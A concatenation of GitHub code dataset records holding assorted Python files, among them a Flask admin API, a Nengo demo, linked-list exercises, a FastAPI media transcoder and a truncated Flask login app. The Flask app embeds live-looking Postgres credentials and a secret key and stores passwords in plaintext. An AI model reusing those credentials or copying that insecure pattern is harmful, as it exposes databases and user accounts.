unregister(self, client_to_unregister):\n \"\"\"\n Search for the client_to_unregister in all workspaces\n \"\"\"\n for workspace_name, clients in self.workspace_clients.items():\n for client in clients:\n if client == client_to_unregister:\n logger.debug(\"unregistered client from workspace {0}\".format(workspace_name))\n self.leave_workspace(client, workspace_name)\n return\n\n def broadcast(self, msg):\n logger.debug(\"broadcasting prepared message '{}' ..\".format(msg))\n prepared_msg = json.loads(self.prepareMessage(msg).payload)\n for client in self.workspace_clients[prepared_msg['workspace']]:\n reactor.callFromThread(client.sendPreparedMessage, self.prepareMessage(msg))\n logger.debug(\"prepared message sent to {}\".format(client.peer))\n","repo_name":"rsumnerz/faraday","sub_path":"server/websocket_factories.py","file_name":"websocket_factories.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"13061317559","text":"'''\nnote :\n\n'''\n\n###################################################################################\nimport os\nimport dir_info\ndi = dir_info.Info()\nmain_dir = di.main_dir\nprep_dir = di.prep_dir \t\t\t\t\t# \\1_preprocessing\nmodel_dir = di.model_dir \t\t\t\t# \\2_model\nmodule_dir = di.module_dir \t\t\t\t# \\module\nfacility_dir = di.facility_dir\t\t\t# \\facility\nplot_dir = di.plot_dir\t\t\t\t\t# \\plot\ncluster_dir = di.cluster_dir \t\t\t# \\0_temp_dir(clustering)\nfacility_list = self.facility_list\t\t#['업무시설', '판매 및 숙박시설', '문화시설', '교육시설']\n","repo_name":"KIM-HANJOO/main_hydrogen","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74916191494","text":"import os\nimport sys\nfrom galileo.tests.utils import (\n zk_server,\n zk_path,\n)\nfrom galileo.framework.python.service import start_service\n\nshard_index, shard_count = 0, 1\nif len(sys.argv) > 1:\n shard_index = int(sys.argv[1])\nif len(sys.argv) > 2:\n shard_count = int(sys.argv[2])\n\nbase_dir = os.path.dirname(os.path.abspath(__file__))\ndata_dir = os.path.realpath(os.path.join(base_dir, '../../testdata'))\nstart_service(data_dir,\n zk_server=zk_server,\n zk_path=zk_path,\n shard_index=shard_index,\n shard_count=shard_count,\n daemon=False)\n","repo_name":"JDGalileo/galileo","sub_path":"galileo/tests/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"44"} +{"seq_id":"12294223620","text":"from services.api.app.domain.services.player_projection_service import PlayerProjectionService, create_player_projection_service\nfrom fastapi import Depends\n\nfrom services.api.app.domain.services.roster_projection_service import RosterProjectionService, create_roster_projection_service\nfrom .api_router import APIRouter\n\nrouter = APIRouter(prefix=\"/projection/league/{league_id}\")\n\n\n@router.get(\"/player/{player_id}\")\nasync def player(\n league_id: str,\n player_id: str,\n service: PlayerProjectionService = Depends(create_player_projection_service)\n):\n return service.get_projection(league_id, player_id)\n\n\n@router.get(\"/roster/{roster_id}\")\nasync def roster(\n league_id: str,\n roster_id: str,\n service: RosterProjectionService = Depends(create_roster_projection_service),\n):\n return service.get_projection(league_id, roster_id)\n","repo_name":"mdryden/110yards","sub_path":"services/api/app/routers/projection_router.py","file_name":"projection_router.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"35390294707","text":"## Problem: Given a linked list, remove all the duplicates.\n\n## Solution: We can simply maintain a HashSet of the visited nodes and remove a node if its data is ever repeated.\n## Time and Space Complexity: O(N) and O(N)\n\nclass ListNode:\n def __init__(self, val = 0, next = None):\n self.val = val\n self.next = next\n\ndef removeDups(head: ListNode) -> ListNode:\n ''' Given a singly LL, remove all duplicate nodes'''\n\n temp = ListNode()\n temp.next = head\n seen = set()\n\n ## Edge cases\n if head == None or head.next == None:\n return head\n\n while temp.next != None:\n if temp.next.val in seen:\n toDelete = temp.next\n temp.next = temp.next.next\n del toDelete\n else:\n seen.add(temp.next.val)\n \n return head\n\n## Follow-up: Remove duplicates no space -> we have to sacrifice time.\n\ndef removeDuplicateNoSpace(head: ListNode) -> ListNode:\n temp = head\n \n while temp != None:\n lookahead = temp\n while lookahead.next != None:\n if lookahead.next.val == temp.val:\n lookahead.next = lookahead.next.next\n else:\n lookahead = lookahead.next\n temp = temp.next\n \n return head\n","repo_name":"raopg/algorithm-solutions","sub_path":"CTCI/Linked_Lists/removeDups.py","file_name":"removeDups.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"22066060186","text":"import logging\n\nfrom flask import jsonify, current_app\nfrom flask_restx import Namespace, Resource, reqparse\n\nfrom app import oidc\nfrom app.controller.Decorator import isAdmin\n\napi = Namespace(name='admin', description=\"API de gestion des services d'administration (API sécurisée)\")\n\narguments_pastell_controller = reqparse.RequestParser()\narguments_pastell_controller.add_argument('id_e',\n help=\"identifiant de l'entitie dans pastell pour lequel on souhaite effectuer l'action\")\n\narguments_udata_controller = reqparse.RequestParser()\narguments_udata_controller.add_argument('annee', help=\"Année de generation\")\narguments_udata_controller.add_argument('siren', help=\"siren de l'organisme\")\n\narguments_annee_controller = reqparse.RequestParser()\narguments_annee_controller.add_argument('annee', help=\"Année de generation\")\n\n\n@api.route('/solr/clear')\nclass AdminCtrl(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def get(self):\n from app.tasks.utils import solr_clear_all\n solr_clear_all()\n return jsonify({\"statut\": 'ok'})\n\n\n@api.route('/solr/delete/')\nclass AdminSolrDeleteCtrl(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def delete(self, id_publication):\n from app.tasks.utils import solr_connexion\n try:\n solr = solr_connexion()\n solr.delete(q=\"publication_id:\" + str(id_publication))\n except Exception as e:\n logging.exception(\"Erreur lors suppression dans solr de l'id_publication: %s\" % id_publication)\n raise e\n return jsonify({\"statut\": 'ok'})\n\n\n\n@api.route('/publier/rejeu')\nclass AdminPulicationRejeu(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.publication import creation_publication_task\n import os\n for entry in os.scandir(current_app.config['DIRECTORY_RELAUNCH']):\n if entry.name.endswith(\".zip\"):\n creation_publication_task.delay(os.path.join(current_app.config['DIRECTORY_RELAUNCH'], entry.name))\n\n return jsonify({\n \"statut\": 'demande de relance des fichiers zip présent dans le dossier de relance (taches asynchrone)'})\n\n@api.route('/publier/datagouv/deliberation')\nclass AdminPulicationDelibSCDL(Resource):\n @api.expect(arguments_annee_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.datagouv_tasks import generation_and_publication_scdl\n args = arguments_annee_controller.parse_args()\n annee = args['annee']\n generation_and_publication_scdl.delay('1', annee)\n return jsonify({\n \"statut\": 'demande de generation et publication du SCDL deliberation sur data gouv effectuée (taches asynchrone)'})\n\n\n@api.route('/publier/datagouv/budget')\nclass AdminPulicationBudgetSCDL(Resource):\n @api.expect(arguments_annee_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.datagouv_tasks import generation_and_publication_scdl\n args = arguments_annee_controller.parse_args()\n annee = args['annee']\n generation_and_publication_scdl.delay('5', annee)\n return jsonify({\n \"statut\": 'demande de generation et publication du SCDL budget sur data gouv effectuée (taches asynchrone)'})\n\n\n@api.route('/publier/datagouv/decpHisto')\nclass AdminPulicationDecpHisto(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.marches_tasks import generation_marche_histo\n generation_marche_histo.delay()\n return jsonify({\n \"statut\": \"demande de generation et publication du decp des années historique à partir de 2014 (taches asynchrone)\"})\n\n\n@api.route('/publier/datagouv/decpHisto/annee')\nclass AdminPulicationDecpHistoAnnee(Resource):\n @api.expect(arguments_annee_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.marches_tasks import generation_marche_annee\n args = arguments_annee_controller.parse_args()\n annee = args['annee']\n generation_marche_annee.delay(str(annee))\n return jsonify(\n {\"statut\": \"demande de generation et publication du decp pour l'année en parametre (taches asynchrone)\"})\n\n\n@api.route('/publier/datagouv/decp')\nclass AdminPublicationDecp(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.marches_tasks import generation_marche\n generation_marche.delay()\n return jsonify(\n {\"statut\": \"demande de generation et publication du decp pour l'année courante (taches asynchrone)\"})\n\n\n\n@api.route('/publier/udata/decp')\nclass AdminUdataDecpCtrl(Resource):\n @api.expect(arguments_udata_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.udata_tasks import publication_udata_decp\n args = arguments_udata_controller.parse_args()\n siren = args['siren']\n annee = args['annee']\n publication_udata_decp.delay(siren, annee)\n return jsonify(\n {\"statut\": 'demande de déclenchement udata decp (taches asynchrone)'})\n\n\n@api.route('/publier/udata/budget')\nclass AdminUdataBudgetCtrl(Resource):\n @api.expect(arguments_udata_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.udata_tasks import publication_udata_budget\n args = arguments_udata_controller.parse_args()\n siren = args['siren']\n annee = args['annee']\n publication_udata_budget.delay(siren, annee)\n return jsonify(\n {\"statut\": 'demande de déclenchement udata budget (taches asynchrone)'})\n\n\n@api.route('/publier/udata/deliberation')\nclass AdminUdataDeliberationCtrl(Resource):\n @api.expect(arguments_udata_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.udata_tasks import publication_udata_deliberation\n args = arguments_udata_controller.parse_args()\n siren = args['siren']\n annee = args['annee']\n publication_udata_deliberation.delay(siren, annee)\n return jsonify(\n {\"statut\": 'demande de déclenchement udata deliberation (taches asynchrone)'})\n\n\n@api.route('/publier/udata/all')\nclass AdminUdataAllCtrl(Resource):\n @api.expect(arguments_annee_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.udata_tasks import publication_udata\n args = arguments_annee_controller.parse_args()\n annee = args['annee']\n publication_udata.delay(annee)\n return jsonify(\n {\"statut\": 'demande de déclenchement udata budget, deliberation & decp (taches asynchrone)'})\n\n\n@api.route('/publier/udata/decpHisto')\nclass AdminUdataPublicationDecpHisto(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.udata_tasks import publication_udata_decp_histo\n publication_udata_decp_histo.delay()\n return jsonify({\n \"statut\": \"demande de generation et publication du decp des années historique à partir de 2014 vers udata (taches asynchrone)\"})\n\n\n@api.route('/publication/republier/all/')\n@api.doc(params={'etat': '1 =publie, 0=non, 2=en-cours, 3=en-erreur'})\nclass PublicationRepublierCtrl(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self, etat):\n from app.tasks.publication import republier_all_acte_task\n republier_all_acte_task.delay(etat)\n return jsonify(\n {\"statut\": \"ETAT:\" +str(etat)+ '- demande de republication prise en compte (taches asynchrone)'})\n\n@api.route('/publication/republier//')\n@api.doc(params={'etat': '1 =publie, 0=non, 2=en-cours, 3=en-erreur'})\nclass PublicationRepublierSirenCtrl(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self, siren, etat):\n from app.tasks.publication import republier_actes_pour_siren_task\n republier_actes_pour_siren_task.delay(siren, etat)\n return jsonify(\n {\"statut\": \"ETAT:\" +str(etat)+ ' SIREN: '+str(siren)+'- demande de republication prise en compte (taches asynchrone)'})\n\n\n@api.route('/parametrage/valorisation')\nclass AdminValorisation(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.parametrage_tasks import valorisation_all_nic_denomination\n valorisation_all_nic_denomination.delay()\n return jsonify(\n {\"statut\": 'Valorisation des nic et denomination'})\n\n\n@api.route('/test/isAdmin')\nclass AdminIsAdmin(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def get(self):\n return jsonify(\n {\"rep\": 'Welcome admin'})\n","repo_name":"megalis-bretagne/opendata-extraction","sub_path":"app/controller/AdminCtrl.py","file_name":"AdminCtrl.py","file_ext":"py","file_size_in_byte":10085,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"9974276247","text":"# # Nengo Example: Multiplication\n\n# This example will show you how to multiply two values. The model\n# architecture can be thought of as a combination of the combining demo and\n# the squaring demo. Essentially, we project both inputs independently into a\n# 2D space, and then decode a nonlinear transformation of that space (the\n# product of the first and second vector elements).\n\n# Create the model object\nimport nengo\nmodel = nengo.Network(label='Multiplication')\nwith model:\n # Create 4 ensembles of leaky integrate-and-fire neurons\n A = nengo.Ensemble(100, dimensions=1, radius=10, label=\"A\")\n B = nengo.Ensemble(100, dimensions=1, radius=10, label=\"B\")\n\n # Radius on this ensemble is ~sqrt(10^2+10^2)\n combined = nengo.Ensemble(224, dimensions=2, radius=15, label=\"combined\")\n\n prod = nengo.Ensemble(100, dimensions=1, radius=20, label=\"product\")\n\n# These next two lines make all of the encoders in the Combined population\n# point at the corners of the cube. This improves the quality of the\n# computation. Note the number of neurons is assumed to be divisible by 4\nimport numpy as np\n# Comment out the line below for 'normal' encoders\ncombined.encoders = np.tile(\n [[1,1],[-1,1],[1,-1],[-1,-1]],\n (combined.n_neurons // 4, 1))\n\nwith model:\n # Create a piecewise step function for input\n inputA = nengo.Node([0], label=\"input A\")\n inputB = nengo.Node([0], label=\"input B\")\n\n # Connect the input nodes to the appropriate ensembles\n nengo.Connection(inputA, A)\n nengo.Connection(inputB, B)\n\n # Connect input ensembles A and B to the 2D combined ensemble\n nengo.Connection(A, combined[0])\n nengo.Connection(B, combined[1])\n\n # Define a function that computes the multiplication of two inputs\n def product(x):\n return x[0] * x[1]\n\n # Connect the combined ensemble to the output ensemble D\n nengo.Connection(combined, prod, function=product)\n\n nengo.Probe(inputA)\n nengo.Probe(inputB,)\n nengo.Probe(A, synapse=0.01)\n nengo.Probe(B, synapse=0.01)\n nengo.Probe(combined, synapse=0.01)\n nengo.Probe(prod, synapse=0.01)\n nengo.Probe(combined, 'spikes')\n\n\nimport nengo_gui\ngui = nengo_gui.Config()\ngui[model].scale = 1.7291542213316193\ngui[model].offset = -12.174626639948599,130.63578585201708\ngui[A].pos = 175.000, 50.000\ngui[A].scale = 1.000\ngui[B].pos = 175.000, 125.000\ngui[B].scale = 1.000\ngui[combined].pos = 300.000, 87.500\ngui[combined].scale = 1.000\ngui[prod].pos = 425.000, 87.500\ngui[prod].scale = 1.000\ngui[inputA].pos = 50.000, 50.000\ngui[inputA].scale = 1.000\ngui[inputB].pos = 50.000, 125.000\ngui[inputB].scale = 1.000\n","repo_name":"ctn-archive/nengo_gui_2014","sub_path":"nengo_gui/scripts/simple demos/multiplication.py","file_name":"multiplication.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"22714428291","text":"from abstract_adapt_operation import *\n\nclass SpectralErrorWork(DimensionAdaptivity):\n\n\tdef __init__(self, dim, tol, init_multiindex, max_level, level_to_nodes):\n\t\t\n\t\tself._dim \t\t\t\t= dim\n\t\tself._tol \t\t\t\t= tol\n\t\tself._init_multiindex \t= init_multiindex\n\t\tself._max_level \t\t= max_level\n\t\tself._level_to_nodes \t= level_to_nodes\n\n\t\tself._eta = 0.\n\n\t\tself._O \t\t\t\t= OrderedDict()\n\t\tself._A \t\t\t\t= OrderedDict() \n\t\tself._local_error \t\t= OrderedDict()\n\t\tself._key_O \t\t\t= 0\n\t\tself._key_A \t\t\t= 0\n\t\tself._key_local_error \t= 0\n\n\t\tself._multiindex_set \t= []\n\t\tself._init_no_points \t= 0\n\t\tself._stop_adaption \t= False\n\n\t\tself._local_basis_global \t= None\n\t\tself._local_basis_local \t= OrderedDict()\n\n\tdef _get_norm_delta(self, delta_coeff):\n\n\t\tnorm = 0.\n\n\t\tif not isinstance(delta_coeff, np.ndarray) == 1:\n\t\t\tnorm = np.asscalar(delta_coeff)**2\n\t\telse:\n\t\t\tnorm = np.sum([c**2 for c in delta_coeff])\n\n\t\tnorm = np.sqrt(norm)\n\n\t\treturn norm\n\n\tdef _get_local_error_idicator(self, delta_coeff, no_points):\n\t\t\n\t\tlocal_error = self._get_norm_delta(delta_coeff)/no_points\n\n\t\treturn local_error\n\n\tdef init_adaption(self, init_coeff, init_no_points):\n\n\t\tself._key_O \t\t\t\t\t\t\t\t= -1\n\t\tself._key_A \t\t\t\t\t\t\t\t= 0\n\t\tself._key_local_error \t\t\t\t\t\t= 0\n\t\tself._A[self._key_A] \t\t\t\t\t\t= self._init_multiindex\n\t\tlocal_error_indicator \t\t\t\t\t\t= self._get_local_error_idicator(init_coeff, init_no_points)\n\t\tself._local_error[self._key_local_error] \t= local_error_indicator\n\t\tself._eta \t \t\t\t\t\t\t\t\t= local_error_indicator\n\n\t\tself._init_no_points = init_no_points\n\t\tself._multiindex_set.append(self._init_multiindex)\n\n\t\tself._local_basis_local[repr(self._init_multiindex)] \t= self._get_local_hierarchical_basis(self._init_multiindex)\n\t\tself._local_basis_global \t\t\t\t\t\t\t\t= self._get_local_hierarchical_basis(self._init_multiindex)\n\n\tdef do_one_adaption_step_preproc(self):\n\n\t\tlocal_multiindices = []\n\n\t\tmax_index \t= self._select_highest_priority_index()\n\t\tmax_i \t\t= self._A[max_index]\n\t\t\n\t\tself._key_O\t\t\t\t+= 1\n\t\tself._O[self._key_O] \t= max_i\n\t\tself._eta \t\t\t\t-= self._local_error[max_index]\n\n\t\tdel self._A[max_index]\n\t\tdel self._local_error[max_index]\n\n\t\tneighbors_i = Multiindex(self._dim).get_successors(max_i)\n\t\tfor neighbor in neighbors_i:\n\t\t\tif self._is_O_admissible(neighbor):\n\n\t\t\t\tlocal_multiindices.append(neighbor)\n\n\t\t\t\tself._key_A \t\t+= 1\n\t\t\t\tself._A[self._key_A] = neighbor\n\n\t\t\t\tself._multiindex_set.append(neighbor)\n\n\t\t\t\tlocal_basis_neighbor = np.array([self._get_no_1D_grid_points(n) - 1 for n in neighbor], dtype=int)\n\t\t\t\tself._update_local_basis(neighbor.tolist(), local_basis_neighbor)\n\n\t\tlocal_multiindices = np.array(local_multiindices, dtype=int)\n\n\t\treturn local_multiindices\n\n\tdef do_one_adaption_step_postproc(self, curr_coeffs, no_points):\n\n\t\tfor no_points_level, delta_coeff in zip(no_points, curr_coeffs):\n\t\t\tself._key_local_error \t\t\t\t\t+= 1\n\t\t\tlocal_error_indicator\t\t\t\t\t = self._get_local_error_idicator(delta_coeff, no_points_level)\n\t\t\tself._local_error[self._key_local_error] = local_error_indicator\n\n\t\t\tself._eta += local_error_indicator\n\n\tdef check_termination_criterion(self):\n\n\t\tmax_level = np.max(self._multiindex_set)\n\t\tif len(self._A.values()) == 0 or self._eta <= self._tol or max_level >= self._max_level:\n\t\t\tself._stop_adaption = True\n\n\tdef serialize_data(self, serialization_file):\n\t\t\n\t\twith open(serialization_file, \"wb\") as output_file:\n\t\t\tdata = [self._key_O, self._O, self._key_A, self._A, self._key_local_error, self._local_error, \\\n\t\t\t\t\t\t\t\t\t\tself._eta, self._multiindex_set, self._local_basis_local, self._local_basis_global]\n\t\t\tdump(data, output_file)\n\n\t\toutput_file.close()\n\n\tdef unserialize_data(self, serialization_file):\n\n\t\twith open(serialization_file, \"rb\") as input_file:\n\t\t\tself._key_O, self._O, self._key_A, self._A, self._key_local_error, self._local_error, \\\n\t\t\t\t\t\t\t\t\t\tself._eta, self._multiindex_set, self._local_basis_local, self._local_basis_global = load(input_file)\n\n\t\tinput_file.close()","repo_name":"ionutfarcas/sensitivity-driven-sparse-grid-approx","sub_path":"sg_lib/adaptivity/spectral_error_work.py","file_name":"spectral_error_work.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"23202725156","text":"class single_ll:\n def __init__(self, content):\n self.data = content\n self.next = None\n\n @staticmethod\n def print_ll(node):\n if node == None:\n print(\"Empty LL\")\n return\n ll_str = ''\n while(node.next != None):\n ll_str = ll_str + str(node.data) + \"--->\"\n node = node.next\n ll_str = ll_str + str(node.data)\n print(ll_str)\n\n @staticmethod\n def print_ll_using_rec(node):\n if node != None:\n print(node.data)\n single_ll.print_ll_using_rec(node.next)\n\n @staticmethod\n def rev_ll(node):\n if node.next != None:\n next_node = single_ll.rev_ll(node.next)\n next_node.next = node\n \n \n return next_node\n \n \n\nif __name__ == \"__main__\":\n\n head = None\n while True:\n data = raw_input(\"Enter Choice:\\n1. Enter LL:\\n2. Print LL\\n3. Reverse LL\\n4. Exit\\n\")\n if data == '1':\n dat_list = raw_input(\"Insert your LL:\\n\").strip().split()\n for dat in dat_list:\n if head == None:\n head = single_ll(dat)\n continue\n new_node = single_ll(dat)\n node = head\n while(node.next != None):\n node = node.next\n node.next = new_node\n elif data == '2':\n single_ll.print_ll(head)\n elif data == '3':\n head = single_ll.rev_ll(head)\n elif data == '4':\n print('Bye!')\n break\n else:\n print('Wrong Entry')\n","repo_name":"mindalkar/python-code","sub_path":"linked_list/single_ll.py","file_name":"single_ll.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73663136451","text":"from fastapi import FastAPI, UploadFile, File, HTTPException\nimport uvicorn\nimport shutil\nimport os\nfrom ffmpeg_convert import FFMConverter\nfrom fastapi.responses import FileResponse\nimport glob\nimport ffmpeg\nimport pandas as pd\nimport random\nimport string\nfrom decouple import config\n\n\n# Begin API\napp = FastAPI()\n\n@app.post(\"/\")\nasync def upload(file: UploadFile = File(...)):\n # Stream Info\n stream_info_df = pd.read_csv('stream_info.csv')\n crash_analytics_df = pd.read_csv('crash_analytics.csv')\n\n file_name = file.filename\n file_path = r'Uploads/'+ file_name\n files_list = list(glob.glob(r\"Uploads/*\"))\n files_list = [file.replace('\\\\', '/') for file in files_list]\n\n # If a file with same name is uploaded again, overwrite permission is being asked on the server.\n # To override that we'll create a duplicate filename.\n num = 2\n while file_path in files_list:\n if num == 2:\n file_name = file_name.split('.')[0]+'-' +str(num)+'.'+file_name.split('.')[1]\n file_path = r'Uploads/' + file_name\n else:\n file_name = file_name.split('-')[0]+'-' +str(num)+'.'+file_name.split('.')[1]\n file_path = r'Uploads/' + file_name\n num = num+1\n\n # Save the uploaded file on server\n try:\n with open(file_path, \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n await file.close()\n except:\n error_msg = 'Timeout error: The uploaded file is too large.'\n crash_analytics_df.loc[len(crash_analytics_df)] = [408,\n error_msg,\n 0]\n crash_analytics_df.to_csv('crash_analytics.csv', index=False)\n raise HTTPException(status_code=408, detail=error_msg)\n\n\n # Transcode the uploaded file to mp3/mp4 - based on the format of the file.\n ffm = FFMConverter()\n try:\n file_type = ffmpeg.probe(file_path)['streams'][0]['codec_type']\n except:\n os.remove(file_path) #Delete the unwanted file.\n error_msg = 'The uploaded file is neither a video nor an audio file.'\n crash_analytics_df.loc[len(crash_analytics_df)] = [406,\n error_msg,\n file_path.split('.')[1]]\n crash_analytics_df.to_csv('crash_analytics.csv',index=False)\n raise HTTPException(status_code=406, detail=error_msg)\n\n url_key = \"\".join(random.sample(string.ascii_lowercase + string.ascii_uppercase + string.digits\n , 10))\n if file_type == 'audio':\n download_file_name = file_name.split('.')[0] + '_transcoded.mp3'\n ffm.convert_py(file_path, r'Downloads/'+download_file_name)\n download_url = config('host')+r'download/'+file_name.split('.')[0]+'_transcoded.mp3'+'?url_key='+str(url_key)\n duration = ffmpeg.probe(r'Downloads/'+file_name.split('.')[0]+'_transcoded.mp3')['format']['duration']\n elif file_type == 'video':\n download_file_name = file_name.split('.')[0] + '_transcoded.mp4'\n ffm.convert_py(file_path, r'Downloads/'+download_file_name)\n download_url =config('host')+r'download/' + file_name.split('.')[0] + '_transcoded.mp4'+'?url_key='+str(url_key)\n duration = ffmpeg.probe(r'Downloads/'+file_name.split('.')[0]+'_transcoded.mp4')['format']['duration']\n else:\n error_msg = 'The uploaded file is neither a video nor an audio file.'\n crash_analytics_df.loc[len(crash_analytics_df)] = [406,\n error_msg,\n file_path.split('.')[1]]\n crash_analytics_df.to_csv('crash_analytics.csv', index=False)\n raise HTTPException(status_code=406,\n detail=error_msg)\n\n #os.remove(file_path) - Optional Feature to not save files on the server.\n\n\n stream_info_df.loc[len(stream_info_df)] = [file_name,\n file_type,\n float(os.path.getsize(file_path)/1024),\n duration,\n download_file_name,\n download_url,\n url_key]\n stream_info_df.to_csv('stream_info.csv',index=False)\n\n\n #Response\n return {\"file name\": file.filename,\n \"file type\": file_type,\n \"size (kb)\": float(os.path.getsize(file_path)/1024),\n \"Download mp4 url\": download_url,\n \"Durations (s)\": duration\n }\n\n@app.get(\"/download/{file_name}\")\nasync def download(file_name: str, url_key: str):\n stream_info_df = pd.read_csv('stream_info.csv')\n df = stream_info_df[stream_info_df['download_file_name'] == str(file_name)]\n print(str(df.url_key.to_list()[0]))\n if df.url_key.to_list()[0] == url_key: #Remove this condition for publicly shareable URLS\n return FileResponse(r'Downloads/'+file_name)\n\n\n@app.get(\"/analytics\")\ndef analytics():\n stream_info_df = pd.read_csv('stream_info.csv')\n df = stream_info_df[['file_name', 'file_type', 'size_kb', 'duration_s']]\n return df.to_dict()\n\n\n@app.get(\"/crashanalytics\")\ndef analytics():\n crash_analytics_df = pd.read_csv('crash_analytics.csv')\n print(crash_analytics_df)\n return crash_analytics_df[['status_code','file_type']].to_dict()\n\nif __name__ == '__main__':\n uvicorn.run(app)","repo_name":"d-saikrishna/Transcode","sub_path":"transcode.py","file_name":"transcode.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29629051768","text":"import os\n\nimport json\nimport requests\n\nfrom flask import Flask, render_template,request,redirect,g,url_for,jsonify\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom helper import *\n\napp = Flask(__name__)\napp.secret_key='PAS074BEL033'\n\n# Check for environment variable\n#if not (\"postgres://svnvtjemvqnasi:0367c449c3f870110f30008d5500264e9ff39065cf04d3676e6794b44f41ba90@ec2-50-17-178-87.compute-1.amazonaws.com:5432/dfb6qsqakpdnee\"):\n # raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Set up database\nengine = create_engine(\"postgres://syahiefttgcgvy:db851348c34b1236c173ba3e53c344b48f6b32f569c78dd10a24333ca00f9b1d@ec2-54-81-37-115.compute-1.amazonaws.com:5432/d1q9cltmus4bb3\")\ndb = scoped_session(sessionmaker(bind=engine))\n\n\n#index page\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"layout.html\")\n#login page\n@app.route(\"/login\",methods=[\"GET\",\"POST\"])\ndef login():\n\t#getting username and database\n\tif request.method==\"POST\":\n\t\tsession.pop('user',None)\n\t\tusername=request.form.get(\"name\")\n\t\tpassword=request.form.get(\"password\")\n\t\tlogging=db.execute(\"SELECT username,password FROM users WHERE username=:username AND password=:password\",{\"username\":username,\"password\":password}).fetchone()\n\t\tif logging is None:\n\t\t\terror=\"Username or Password is wrong.Try again.\"\n\t\t\treturn render_template(\"login.html\",error=error)\n\t\t\t\n\t\tsession['user']=username\n\t\treturn redirect(url_for('search'))\n\tsession.pop('user',None)\n\treturn render_template(\"login.html\")\n#page for registration\n@app.route(\"/signin\",methods=[\"GET\",\"POST\"])\ndef signin():\n\tif request.method==\"POST\":\n\t\t#taking the information\n\t\tusername=request.form.get(\"username\")\n\t\tpassword=request.form.get(\"password\")\n\t\temail=request.form.get(\"email\")\n\t\tnumber=request.form.get(\"phone\")\n\t\t#checking the information for unique identity\n\t\tregistering=db.execute(\"SELECT username,email,phone FROM users WHERE username=:username\",{\"username\":username}).fetchone()\n\t\tif registering is not None:\n\t\t\terror=\"username taken\"\n\t\t\treturn render_template(\"signin.html\",error=error)\n\t\tregistering=db.execute(\"SELECT username,email,phone FROM users WHERE email=:email\",{\"email\":email}).fetchone()\n\t\tif registering is not None:\n\t\t\terror=\"email already registerd\"\n\t\t\treturn render_template(\"signin.html\",error=error)\n\n\t\tdb.execute(\"INSERT INTO users(username,password,email,phone) VALUES (:username,:password,:email,:phone)\",{\"username\":username,\"password\":password,\"email\":email,\"phone\":number})\n\t\tdb.commit()\n\t\treturn redirect(url_for('login'))\n\treturn render_template(\"signin.html\")\n\n@app.route(\"/search\", methods=[\"GET\",\"POST\"])\n\ndef 